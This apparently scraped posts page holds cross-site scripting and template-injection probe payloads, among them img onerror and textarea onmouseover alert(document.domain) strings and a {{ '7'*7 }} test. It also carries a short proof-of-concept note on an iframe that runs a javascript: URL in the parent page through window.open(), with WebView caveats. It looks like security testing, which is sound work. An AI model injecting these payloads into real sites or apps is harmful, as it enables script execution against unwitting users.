Posts

pop

Recent posts

{{ '7'*7 }}

{{ '7'*7 }}"><img src=x onerror=alert(document.domain)>    &lt;img src=x onerror=alert(document.domain)&gt; {{ '7'*7 }}"><img src=x onerror=alert(document.domain)> ">&lt;textarea input=x onmouseover=alert(document.domain)&gt;                                 &lt;img src=x onerror=alert(document.domain)&gt; {{ '7'*7 }}"><img src=x onerror=alert(document.domain)> ">&lt;textarea input=x onmouseover=alert(document.domain)&gt;

test

iframe on Tap/click this iframe, which will call window.open() with a javascript: URL that executes in the parent page context. (Observe the injected HTML in the parent page, and potentially an alert() dialog.) Other events that result in user activations consumable by window.open() also work, such as focus events. The alert() test is not reliable: if WebChromeClient.onJsAlert() is not defined or returns false, no alert dialog box will be shown even though the PoC works. Other actions, such as injecting HTML into the parent page, are more reliable.